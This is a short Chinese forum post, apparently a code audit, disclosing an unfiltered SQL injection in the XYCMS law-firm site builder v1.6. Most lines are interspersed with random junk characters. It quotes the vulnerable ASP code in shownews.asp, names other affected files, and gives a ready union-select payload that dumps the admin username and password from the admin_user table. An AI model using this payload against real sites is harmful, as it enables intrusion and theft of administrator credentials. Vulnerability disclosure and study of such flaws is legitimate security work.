前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似, O1 p/ D& c2 I. ?( z
' `7 k @* f( J: M& h' g2 i7 u淫荡分割线
" ]# Y0 c* o( _& `1 @. X--------------------------------------------------------
6 f, `' B/ y% I- C* ~9 W+ c7 Y 1 p* D e1 E l8 h y* ?
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
, x2 ~% c7 C# o. L" ]; m) r源码地址:http://down.chinaz.com/soft/29233.htm
. e( R6 `' r1 ^, o- l ' ^9 G6 H6 |: f) D3 v& g+ z+ P0 c, s
漏洞文件:shownews.asp/ A0 m/ q$ {# j) f" T5 L9 O
漏洞代码:7-13行$ I4 I0 N7 e! B5 \$ t
9 p. ~1 b8 e& V+ i3 t9 b% G
& T2 B/ S( }0 @" | l, V<% ) J$ i- w2 v- t! E4 b
id=request.QueryString("id")
- K* q1 ~- x9 l- q# U
/ S# f" C! E% o8 M0 R! Rset snews=server.createobject("adodb.recordset")
7 V( ?+ }' v: k4 W! \; l# Jexec="select * from [news] where id="&id- d0 {/ \" w, K! v4 ~& r8 D
snews.open exec,conn,1,15 D M5 |& M* w2 |* P1 N1 i
%>
. l) V! p6 I4 t5 M$ r % [" [5 ^$ u* {" @5 m( n7 w
1 G# i( ~ O7 x V# ~
什么过滤都没有 直造成注入4 g# ?# v# w" A
/ N1 R _5 b& ^% Y T& B8 c注入点:http://127.0.0.1:99/shownews.asp?id=xx
2 Q& Z1 ~( i% k+ J$ ^7 w
, v3 G( Y: y9 G0 }- ?% Z6 ^/ g9 W其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找% H5 J4 e" u( R7 f
8 I" O& a6 R) z- \: C
! }0 x# g' L+ A) Gexp: union select 1,admin,password,4,5,7 from admin_user. r, ^/ k9 j( T
6 Z' x- u# r% `& m* T9 Y
|